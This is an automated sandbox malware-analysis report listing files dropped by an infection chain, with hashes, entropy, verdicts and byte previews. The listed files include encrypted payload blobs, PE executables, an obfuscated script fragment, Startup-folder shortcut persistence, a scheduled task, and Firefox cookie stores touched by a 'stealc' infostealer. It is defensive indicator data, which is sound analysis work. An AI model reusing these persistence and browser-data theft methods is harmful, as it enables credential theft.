Preview:	.....m....u.j...f..6 t$..y...k...g%%X..\.9.~...jv.\|1{.c......9+.D;.<\|ot.]J......N4.A..p7........7..8Z.,%v.I....w...r.SJ..:..Zn...i<.^...S~.1(K.._\+..'.`.....=..H..-q..;F......4.]-._.N.......2.k.....9.hu......A.?U.....j...U...d..}....i.....L..1...0.~...fW..e........u...bf.B>..$J...(.w-.H....+Zd..Z..O..&.G;..7.v..2x.....8.....f..w..?.<.kLZ...FG."T/.o\.&.&?f..B.'1.a.0w.........c..3.z"I>....v..e]....d..YW..E....V..&.e....=5.;]Z.h..R?....p..j.=..8..../..Z"'.%L...w...d.k.A.........9.M.c.0"..@.. ...m...C..?..#.-...C=.K..K.f...A....J',S.........g(v>q........+..6.Z7.^..aA.?p..<.....~t.A..;.<...k.6..x.5...j"...b..K.c.Q.J..~...v%<"]..^..l$....X.z.}..!......LN..7....A.U.%...a.L.'./=..j......~....<..}....bP?.4..<.v.vd....S.3:c}.2....A_..cD..F.A%4o..-."LS..\..H....M.6?{.>.l.b~..y....D.:yGV'..ye"it..)..,..s.BT7.iEl{y.d.9.T.L(.f..K...m...$..`.0.I8......fi.G....$.L...{.9.%..v......(.....Y...M.k\|.... f.t...G.).J. ...V...m.=.p>$)U.41.s..x.P.^,5.Z.x_I..+Xpc

C:\Users\user\AppData\Local\Temp\See

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	59392
Entropy (8bit):	7.997208571345154
Encrypted:	true
SSDEEP:	1536:WcKhUVngPRVt768UQOH96BBoYRoskvQIevMAVlXaR7ZQRu:EVt760O96BuYODQIev5XaR7ZAu
MD5:	84C831B7996DFC78C7E4902AD97E8179
SHA1:	739C580A19561B6CDE4432A002A502BEA9F32754
SHA-256:	1AC7DB51182A2FC38E7831A67D3FF4E08911E4FCA81A9F2AA0B7C7E393CC2575
SHA-512:	AE8E53499535938352660DB161C768482438F5F6F5AFB632CE7AE2E28D9C547FCF4ED939DD136E17C05ED14711368BDD6F3D4AE2E3F0D78A21790B0955745991
Malicious:	true
Reputation:	unknown
Preview:	...2.v..5.R.w&o(.9.A..B....g.b.'....3,m............Xo#.....}.".....{.......iT8d.g....W...q.?............[..........:r.k.....1....U.X.j(.c.....u..0....%2..[.<..`Bl.(.DW..@...7..P..m.E.......f.o.#c.Q.\|.G....ke[.D.....^!.k..!..i.......".'..g.n.1..{...J..>G..3.[........%....fT\...O.SS..<.I_PF..E..9..t./..."ae..%.Q.wBI..t3../].#.vCQ>U...lx....B74( ........1..g..2l.k.1.X.......fq.5......m.[..oZ.....?....I.UU0n...>..VZ....J..(...).h.9..s...h...M]..t8._.i....d.NQ...Hr..O.R..G.rl.:....h...'.S...U.7.......6.....>.r:..d>.-..........T+...OA; y.Ynj.13w..u.R......{....5.j[..\|.....t1.".)..L..l.=^.Z\.S6......sK.1.0>.....Q....X...O...^7'.....".Es.p.2...g.4....s..U..M'.3x.......jll.{E/...+B.5..=....PD....DH;A,h...7.._.....8....&.k.....>.?....z.g......\|...r..(....l...,...y...<....]....."+..@.s...:.......I]}+..XYm:.\|ns...3...(.gmt..5m.x.....i....<..oF[..1..<...Fv.6.c3.<.^........!WO`..o.....J~w...}....wt.ml....T1.....#".V.o..q...&...f......$.......d.u.9[..

C:\Users\user\AppData\Local\Temp\Spirit

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997700414089635
Encrypted:	true
SSDEEP:	1536:UbTfzEhiJxYN/aeuU5rg6QJ7mrO+NMwViBsSRgucsmgcqtEyKNcHDrlzLbQCu+Em:UbTwhqypFuUKByrO+JiFgOmgceEydHDb
MD5:	0814E2558C8E63169D393FAC20C668F9
SHA1:	52E8B77554CC098410408668E3D4F127FA02D8BD
SHA-256:	CFDC18B19FE2C0F099FD9F733FE4494AA25B2828D735C226D06C654694FCF96D
SHA-512:	80E70A6EB57DF698FE85D4599645C71678A76340380D880E108B391C922ADADF42721DF5AA994FCFB293AB90E7B04FF3D595736354B93FCB6B5111E90B475319
Malicious:	true
Reputation:	unknown
Preview:	,#.g.'....E.?9..>j.B1.xr...L].k5....<..n3.s1....[3.D...B.5u.1..9f...rS....H..x...[...j[....2...sGH..>q.X+.dT..y.k..K..x.ya..Ra.0.)0.......Q..E}.6Y.'.`.u_.../`l%..\;..=...I..U 7..M@\.v.J.....2...e.r.N..3.L..$.f.S.....OUp.>.%".l_?#.<T%..J...^2.H..=PY(...#MoK...+p...3{8.H...T.^.....i.}Yf..P....k7........QW.E&Vu]j.\.g]3d..U..`K>...u...F.E/S.Qw;..j.d.CWL..0....)?."...lJ.......>....U...8.....]V.......1...(.Y./..=..&7T4Sh.....6..@.....././..qg+./J...7..c.#...^....N./.....9..39.Pt...62.+.....A.y.n!U1...V..<.J.n.^.s..D...k.......4'7.K.T{b...2M.h2.y.2B.ZF.~...........e.lnP..6#..~.v....B.qrh.K.:V^.o...^..}......7..pJ3.s....A.g.T..(..)V..7.y..I.GiC..~......c+.~u..4V!5...1..........b.8....C.,...eV....l:..=k...%.-.....TI.\|.."...!...f)..EV*0.....W71........h.h..&...../.u..c.@.. ..-h...'..].otw_\P..b.Hz....8L8!=-...V.2T...6.T.F&..a\.....Qt......#...b..4.q.$]....F.!HE.....h..P.....:\.r...R...@cd......1.d..8.....H.`v.....=:^.#...p......h#m.g.

C:\Users\user\AppData\Local\Temp\Sponsorship

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	7.9974812887747095
Encrypted:	true
SSDEEP:	1536:uKBvAKYhV7WXUiDJs3tfBOn4EdtDKA5w1+naRsk:uUAKgbaJs9fBODj5Fny
MD5:	6785E2E985143A33C5C3557788F12A2B
SHA1:	7A86E94BC7BC10BD8DD54ADE696E10A0AE5B4BF0
SHA-256:	66BBE1741F98DBB750AA82A19BC7B5DC1CDBECF31F0D9DDB03FF7CF489F318C7
SHA-512:	3EDAD611D150C99DBB24A169967CC31E1D3942C3F77B3AF2DE621A6912356400C8003B1C99A7236B6BED65BD136D683414E96C698EABD33D66D7AB231CDFEE91
Malicious:	true
Reputation:	unknown
Preview:	v._.........6..O&.F...\^$..........-.%..xB.D.......".Y.i.O.e. Z..Z.U......,......~..Au..z.3.?..!...6.@.o..< ......D.9......E..Z7:!/.9}c.a.N1.[,8.g jO..[...w.^&A..u..aq..z-H....l..lIx .a...B....^...dP~3...S..V"...3.u..?....{...,o.EZ3..~B.j...."\9..7}l.G.............2....Fh....F\|.LDF+.7....2..."gK ..H.fO[..)......../...X..M...c..FV&S=..W]}..v.].b..P...?{.G.e.g.G..^;s0+.hB....U.LN-..l..G.zn.....t....Y.\.s....9.P..2Y...u{.bd.C..../t<t.."^..3[..........#B.w...5...rH..?.oo..\|.....T..u.\g.......G..%.v.E9c...5sZ;i)...y q_.Gp;...\|t. ........P...`..K.+....f....'..Jz./.....w....6l.c..R..A.N...oM..F.A....F....n.-9M...@:..C.......t..=w.Q....E..>.g{.....Z..dP;...1....rBts3@6.^..RM.Aq;8>.<..Qr.:.c..q.v.Z{...2..E.I.Jm .Q.vIci~kE.i4.......\...85m R...u...,.sE..k........O.0..$.b.5..."!}..,H}.A....{..#x.1>?.Y1..L8}n.p<.V5...]n...v....7.wZ.y.%]G8\|....UX...$.......A.'.T...jf..71..x......(.Y..1..P.h]m.lT..\.....PX.=y_DE7..........a.J.,J.._..d^!..!....O...SA9.W8^...)

C:\Users\user\AppData\Local\Temp\Suitable

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	7.996882733834849
Encrypted:	true
SSDEEP:	1536:2opE7AcK6fBJjgD2pgCHs/hOrZ9hmYjL9iHgWVRvxh6:21EcgD0/M/hgZ9x/9iHgiJo
MD5:	9A86A061AC6F60588A603DAB694901FB
SHA1:	542FA7ABE87867D17DE53C1B430F02B6BAA6C97A
SHA-256:	AEFC1A30B5A9CAE66FA5E1E51B0F73E7214C6B5A07D14819E9C50CADF925517E
SHA-512:	3892E394720D527962B09B6FB03B6C3639CF8E458808D36A1C910823801E54A548690260421CEF7D69E4B365FA4CD09778BC9958A20C898F70783EA53373FCA8
Malicious:	true
Reputation:	unknown
Preview:	..k:..z8...g..\|V.0g.J.H.m[...a.V...m.^...d...[.&....U.S..m......1.H8.]C.......c7[..G...x!..........oL,....#..:.....\|E.....j}F.L...pf.s.`.lD.q..\|<....WGXh.G..@&.....G..4...^.L.....3._g).p.,!.PF.4]..5z.........h..6B\....9Q)..gc.....t..O}L.@4T%.,...W4..v.)....?......._..h._...E.aI.s..O..e.ta..n&Q).%q.J.@...+.ZJ.....J..BR. .F.....;.p)0...9;..W...1=.+./Q..xn%...{F..Lq....8....p.>S{.;.(..x.T,...Db.Hre.B./..&;.w.....Y?].s-.O..wN.XZ'D.88~.VN..'Ku....#ac.8!.T..b.i...r....3...Jw(~..{..4..E..F)_..y..j..o...Z.......@.i%.,mt...m.E....,...D..7.m\|S...j.z.L.`.f]...........$.$....^......:.3..Fz)..n.V.+A).KU]'..]..Ww.B.q.`..M1..K.$.7..S}....R&..z"Ya.TX_..x_..Z..Z.B%2....:.Z...d..}...X.6...{siV.....H.Vg....<..$d...U..M..'.n?.=....n.'.l/:..c.lW..M...uK...`M........o.@..!o.0...s..,"...B...T.....:jb.qA5Hl.../d..2..U...x........B...b.....`../...s.`.~FY.....s...8....~x5^^....v.9.;S.T..T.w....?.._.....+0 M.N..F._;...Ia...]>..-...g.FAf#..{.).)....I.Q<p..@..D.*VU."...

C:\Users\user\AppData\Local\Temp\Sweet

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	886078
Entropy (8bit):	6.6221717879410384
Encrypted:	false
SSDEEP:	12288:2V0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:cxz1JMyyzlohMf1tN70aw8501
MD5:	6CEE6BD1B0B8230A1C792A0E8F72F7EB
SHA1:	66A7D26ED56924F31E681C1AF47D6978D1D6E4E8
SHA-256:	08AC328AD30DFC0715F8692B9290D7AC55CE93755C9ACA17F1B787B6E96667AB
SHA-512:	4D78417ACCF1378194E4F58D552A1EA324747BDEC41B3C59A6784EE767F863853EEBAFE2F2BC6315549BDDC4D7DC7CE42C42FF7F383B96AE400CAC8CF4C64193
Malicious:	false
Reputation:	unknown
Preview:	.j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.\|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j\|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...\|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......\|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..wL........E...P..xL.......}....xL..].....8..xL.......p....u.........................................E @....#E .E..@......E..E .E..E..}..............}...........u-j..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E..} .uFj..E.Pj.j0..@.I.j...X.I..M.+M..M.+...+....E ....@.t.j...X.I.j..Y...E .u..E..u.j.j.P....I..u..E.j.SP....I..E.+E.j..5.xL.j..u$P.E.+E.P.u .u.S.u.h..I..u... .I.

C:\Users\user\AppData\Local\Temp\Treat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe
File Type:	ASCII text, with very long lines (1592), with CRLF line terminators
Category:	dropped
Size (bytes):	28735
Entropy (8bit):	5.082295390762243
Encrypted:	false
SSDEEP:	384:iBjevk+Mu+CF/wwzJmxF7R7az8Fv2Ze819nwCV0hvHHmV+VM4mv95xh+hCRAU3/:iBjZLuPFyfazKypnnj0hvnmsi4mj+1o/
MD5:	84E3F6BFCD653ACDB026346C2E116ECC
SHA1:	43947C2DC41318970CCCEF6CDDE3DA618AF7895E
SHA-256:	00A0C805738394DFED356AAE5A33CE80D8F751C3B5D7E09293817C07FBAEB9FD
SHA-512:	EEBA8F5C0F9163BC38080AC7CFCC5BABF9DFDF36B34B341416CA969B9F19CEBB141F8B0D2E12E7C41D886EEC36E23CF1525A7CE28785AD09154BC3DB78CA0591
Malicious:	false
Reputation:	unknown
Preview:	Set Aluminium=R..lKlXCisco-Scan-Deficit-Generation-Trauma-..PNPerfect-Ranging-..hMZForm-..LunLAccompanied-Casinos-Finding-Camel-..XkAPoster-Br-Mac-Pixels-Screenshots-Riders-..rCqRu-Audio-Considered-Eyed-Debt-Lyric-..RMmArtwork-Industrial-Hip-Dealing-Delicious-Models-Xi-Dry-..ZirRContests-Exam-..Set Drive=9..pmHxScripts-Ix-..TypeExamination-Happened-Lounge-Equality-Exams-Coin-..cUkExcluded-Placing-Informational-Overcome-Tvcom-..YHhFloppy-Shipped-Considerations-Regulations-Inspector-Logs-..eXCartoons-Coach-Ships-Header-Golf-..nTxFlyer-Dt-Dramatic-Clay-Automated-..sRqBulgarian-Mattress-Scientific-Architect-Wait-..sDSBanners-Garden-Velocity-Powerseller-Finish-Chan-..ejEUDependent-..hrBwWearing-Computer-Identity-Analyses-Institutes-Helmet-Myself-..Set Notebooks=M..RhtTransformation-Fear-Nashville-Reform-Fallen-Offer-Magazine-..RcyTheory-Providers-Wilderness-..zdVAntivirus-Sensitive-Only-Opinions-Containers-Back-Piece-..hfseExpanding-..tQKazakhstan-Salmon-Conversation-Pets-Packet-Gods-Square

C:\Users\user\AppData\Local\Temp\Twisted

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	97280
Entropy (8bit):	7.998072949966149
Encrypted:	true
SSDEEP:	1536:/vwNKjdasnic9ups6E94QDYcwUb/Dqm4ieDj1USYYZUJ+Wcl1DthXtM7aqib1Amp:nCKjdasit1EdWuWm4ieDjGSYYZUctPtt
MD5:	BA8C4239470D59C50A35A25B7950187F
SHA1:	855A8F85182DD03F79787147B73AE5ED61FB8D7B
SHA-256:	A6272116DC959A3197A969923F85C000A1388B0A02DF633DEC59B7273BDB421B
SHA-512:	1E6D42C249D206815000CC85D5216D13729246E114647D8CCF174B9BD679530B6B39DFAB2BFCC5D957CC0778A8CF029E544228978682FA285C5E3F9564C2EAF0
Malicious:	true
Reputation:	unknown
Preview:	A@2..3Y.....8p.!..L.[...`..b..f^..J....P@....;.:.."....g...Tz.....T%.R.G.....0$.....n.....r0....R-A..z.N..jK...y.....;.EWs.@b....{....Y9p.)J.....s ;..9.j.........X.K..\|...e..i...`.c..U.h..%...[..b.....n..:Y....M........W>H.....?..O.[......{...7.....C/.!0..\|[&....f.q......}..Q.....+-o.y./T...%..K...vl;4..z."...k:..2[.v.o..{..c5...%...:..kZU1.J?..TI...!...\3_..&L.[{..4..G>..;.%..'...6.q..2....V_.^.....R...g.......<..%.5.j..3.-.o.aj..............j.8aw.6_e}....Z".WLw"S...,....'..6...P.=..xckw}......b..K..h..ad....m{&h...;.o.yR..9.....Q..E.b.....2m..E.r.N..8.u.Q4.m..ht.ck.&f.g...$.....3by..B.V1#.G..y..IL.j......2...\..A..^..T.5....+...W=.Z.[.z....X`.&..z.h...B....\|xs..H&X..Nv..k.5.s.Z...:~9.V.M.PO&.@..m....P.K......".Ju..?.._:%qp.ON..q.....c.AN$N..-MB.q..-.hz.+..O.B.+<~...f..V..5.C"EY..=D..\|.....;.e.\|.g.0.^i..f.._e:...0/.....'.[.........A.1.RY.6}..l.Kf....$.7.N...[ml.W......[.$...p..[H>.+....}.H.....\H2[.'.p......./..z.@...J....-....

C:\Users\user\AppData\Local\Temp\Various

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.9982397133011816
Encrypted:	true
SSDEEP:	1536:+ym7ISM9/koP08TreJM3W/S8mc4NXffUk9IU6RV3EsSqDeKsij2J:+y0lQ/zP0GmbS8h4NPfz63EsSB0U
MD5:	2759C67BCCD900A1689D627F38F0A635
SHA1:	D71B170715ED2B304167545AF2BD42834CCF1881
SHA-256:	510CFD9523A0F8462E8CBDCBBF1AFCCF2AA69A9153472EE48FD28AD4FE06CA05
SHA-512:	AA9E26AD8824ED2CA8BF45C24939E305660CBC19F821A84A7407A16F91D71B2EB9DABA9059D379908F17C9E5A17C0C3E873E5CD7350EE8715E45B2B3EFF2531E
Malicious:	true
Reputation:	unknown
Preview:	5......Z..%D^..\|.....8.6[...8{......ZG.%.80.K[Xd...........56!.>...b9.T.m).mYm.cZ..cy..jC...65.....m+.~.......cl..Ot8..6.t..._=.Q.5..l\.r..>b#.........DU....1... 4.\|k.L.U\......;...D...M^.B...R)D.2...<.T....<GW+..I.....M[...z...k.s..[G].]..d?.o..t._.6h....R.....H..+.uK.i.A..%/..)u..o7%u!x..G.:...jA.F...q......[k....r...u.h.....5_..}Q.;...W.?...Q_......>..x\..dG..;...r......E...R.hq.......X..:..`.j]2s.L...i..)../..q..?..".......h;....')....;...J..l+...7...!.D...g.X.u.......uH..;gj..l.{.~7......\..k.S8...*...O..W.....v..A..C.Bo...z9.2B.."....`.%J Zv.../..I.....WW.l.O..,.@2].if.2....{m.{.i.Q.....j..y....td.}!....".........=.......5..T}0b.....HM.3.f.yA..........-cG..+...G.[`..........DN..".....\|..PU..DOr...lq/..#c....L.......4..6.X.}..KdI.o....;t...DL!.c... ...E..""..@m.m.(E..[]..x.z.......l..........'.......!....t....F......#./........\j...0.A...../a.o..%+..$..[4H.I..;.]:...o+a{Bi.'%C.~...J..^,X6...VNp........:m..e._.U.$.....As2C1<....@G..+.w

C:\Users\user\AppData\Local\Temp\Wisdom

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe
File Type:	data
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	7.996924652343393
Encrypted:	true
SSDEEP:	1536:0LmBTTvF2WqoMTu5pgDAAKX3m1ay9ttyWhMM2Q:0Lj2wmp2+H69ttyyNN
MD5:	5EFEE5D7EDBE127050E3EA3D197120AB
SHA1:	5FA5546F2890EA0298314D46ED7F0BEC3819C3F6
SHA-256:	AE4ADAE2962A4DFCA41929164973D98217401CFA39264F3A367220E09DC87E8B
SHA-512:	3644B60EAEE9D35E9FE33DB8571D0FBE19C61CED979A68098BE93C3CDFAF2A82B3EF8329A015FC0644A48C19782A27864948C120744B2D01D6E0284803DCFC61
Malicious:	true
Reputation:	unknown
Preview:	Z.]8.t.nl.....T.....a..!=..."t._P.d........e.b.1..0.....3&....KB...Q.......b..@yh.......A...4SY,.r.U.#0..h'..q..g.}......c!q....Z......y%=(.N.._.Z....\|.^Y+....o.\.x7t.. 8.s.J% R..\|g..e7.h.7D.s-Zk.^0..i.....K........q{.v....._.'...q.~.../l5.S.d.X..4e.k.\|....?.....6k..........J%.H.x....Y...L.U.......U.QQ...+....s..S>v..5.x9....$.B.hW.F.i.C[..(.W......V...._.?./L.^;/..8#.q.G..&...&.Q.`'.qO.+\|........+~.q....n..3.S-.c...~68..<.DC..${..T..N..&.."K..BW.8....9...2.+Q.E......5O..Z.....T.?o..oQ..PO....\|..94._ ..`.^..y...,...4...\.../..6......-...3Ax.B?.......^X...W.c...+.C.Y.,..../....m..~8.....7RXG.B.D8....W.....{66>....5....(.N.75%s..E...F..~m.$RP.,.Ba..%\|.#CL.1.Qs.F.Y..n@.CP.....a(....]...... X./..N......O....:CWbK.T..9J.d.@...9..3..W...M.....g.......0@..K.R(.2.N.;@5+....-.........z.../}.X...z....(..;GWu...th1..+..9."..L.......YXc.W@..'.3.$K.U...(x..t@[.b.-{...rW.../..2.`.p.O?n......G...(3.1.dE.#..{.d.....@../.).t..!zxX....o...Bc

C:\Users\user\AppData\Local\Temp\Witch

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe
File Type:	data
Category:	dropped
Size (bytes):	54272
Entropy (8bit):	7.996566915559803
Encrypted:	true
SSDEEP:	768:hS0U3Pq9yrDgu1Bw9ntF5gll+E8SmYA8iOH+XOeYb0McISU5M1PS2p+G:hS73AOMcytF5ml+EpezHeDZVSP1K2z
MD5:	79156AFDDD310BE36F037A8F0708A794
SHA1:	09EF36AE22B5EAB65D1F62166542601B8919399D
SHA-256:	7FAAF10D09A27842330725E6510D2754487C5B69BD40E11181DD75B03DF61503
SHA-512:	D1449126F2365F607A390E3B6FECB3BE100BFF9FAE1A773CF5815CAB29EEB72AB4E341022BDE9DE653FD62EDE0FB0C26D9010E524D87060AA364BF92A14E9D01
Malicious:	true
Reputation:	unknown
Preview:	...... WO.+\|`}....D.6.0.n..l&(....mz....3!.d...[..CmK...e.?....1x>I..:MNG).t.......g.4.5^..~....S.-p.b..g..@:.c.%GA}6K........9O.U.L(.\:..!.Y....8....p.se..g..\|.}.....2.W....s....?Qt.N.-O.d(.#..P....#Q.WQ..U............?3~7[........AI...h.\|.2"o..:...}.'T..1........(.8zU.1.m....tfxM..........Gk..1...i....f.eFe.W.+O...Q._ELT...R.h.4....c7.~.....d....V.(%O..b..r.@........m\|...:S. y{..[J..\!.`....%..W' .X.8..^..70.m.4.dy<....=.sG.@I....Y.Z'\.bz.jq..?z..3..6 -z..bha.V.(..^.....&...q{.GYU..#s..}...[.B.r.....[.oH...).48...+.....LB. .4...\..xM..........7.............(....r0J..t....8.P....28.r..=....'+..J n..d2k..Cl....&..J>...8..s...'.st..}..`.y.._.......L...\|p..D....r.i.x..+.Z....Y3?.......l.....r..6xbh..=..S........^.>2....d.=%.X..#....".9.S..tF.c.......Db.....c=he8U..3..1..z}..iD+.}!Q..hE..KiE..@.6...@.#kg3R....b..p.... .?..8..i+.........}.....wP....].og.-.20}N..j=..!.i._m......U.....Z...S6.;.....?,.y...8(.>...b.u........}....

C:\Users\user\AppData\Local\Temp\XLN9V631J4Y45UE4.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1884672
Entropy (8bit):	7.948776245885388
Encrypted:	false
SSDEEP:	49152:bHWBQg2Rh7VudjY8c7ZfUQN8BqM5GYJhI6sByEhXlY:qQggRuds3mnd5GShIBsw1Y
MD5:	36F337DF5AF6FC1D820E0F111A73C352
SHA1:	3764D9AAE67D662B8787BE76DD3E5CD1210AC992
SHA-256:	D374325181508865D937442398A02BDF371EAA7C74CC04CF975B3238C46EC57A
SHA-512:	FDA75FD4E734A59F420445776F9F121B6CE08FD6A6068E63EF784B3BA065B9D84E43181B7FF8B28D6BB1B65B13A41049DA98F4EDFCBABFDA039F0B29BAAE741F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................J.....].....@.................................W...k.......D...................PdJ..............................dJ..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...npluczcb......0.....................@...cveucipf.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ZWAE2K096DYFL3DZL5I.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1884672
Entropy (8bit):	7.948776245885388
Encrypted:	false
SSDEEP:	49152:bHWBQg2Rh7VudjY8c7ZfUQN8BqM5GYJhI6sByEhXlY:qQggRuds3mnd5GShIBsw1Y
MD5:	36F337DF5AF6FC1D820E0F111A73C352
SHA1:	3764D9AAE67D662B8787BE76DD3E5CD1210AC992
SHA-256:	D374325181508865D937442398A02BDF371EAA7C74CC04CF975B3238C46EC57A
SHA-512:	FDA75FD4E734A59F420445776F9F121B6CE08FD6A6068E63EF784B3BA065B9D84E43181B7FF8B28D6BB1B65B13A41049DA98F4EDFCBABFDA039F0B29BAAE741F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................J...........@...........................J.....].....@.................................W...k.......D...................PdJ..............................dJ..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..*.........................@...npluczcb......0.....................@...cveucipf.....pJ.....................@....taggant.0....J.."..................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.877806977454982
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5iXlLRNwF:HRYF5yjowkn23iVLRO
MD5:	D21423FB15E6064109ECAC56F20BF880
SHA1:	F5E1A4BA33938D6DDAF4593F06E9AE2D4A824229
SHA-256:	6138D38938735FABE5CF1AB41EDA55894DF754ABA8B9BDA4018829AC8E7E4DC3
SHA-512:	E867F2E83A141B557C34B7919E3A2A89D2DD743E9A9215683C347D447F790CC8CCB295620AE2FE4D09D1DA5B87ADFF5A282FAE59A85927C0144D5FD0760DA216
Malicious:	true
Reputation:	unknown
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\ProgramData\LgAmARwZ\Application.exe">), ASCII text
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.835479296672176
Encrypted:	false
SSDEEP:	3:HRAbABGQFwGZkRE3ZizRMQJHn:HRYFxFAi/
MD5:	76F433B3FBD6C3D0CA94F50293292ECC
SHA1:	55CECBED8CB353B05CE046AD185488FBCB91BED8
SHA-256:	B04B8AD6F41D55D715FEE227F2C1E4D333627FF2A1B89C0F55E35384028F1B32
SHA-512:	829F24BD3474ABB436D4F685FC6EC8172B1D3AD548CFA71B3CD263B0A3FC353AE4CDD0AB925397FDB07BFA859E79711A6C0B7DBDD95B94B419FEDCE60090BDB6
Malicious:	false
Reputation:	unknown
Preview:	[InternetShortcut].URL="C:\ProgramData\LgAmARwZ\Application.exe"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.3946044019772623
Encrypted:	false
SSDEEP:	6:/XEOXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lBsHut0:fNpRKQ1lOmeeDHjzvYRQVBsHut0
MD5:	3CB7A2241FFB4E2FC9B3510AD499BBBD
SHA1:	A06EA3B3116567B05D5F14881C3EC5CD764539D3
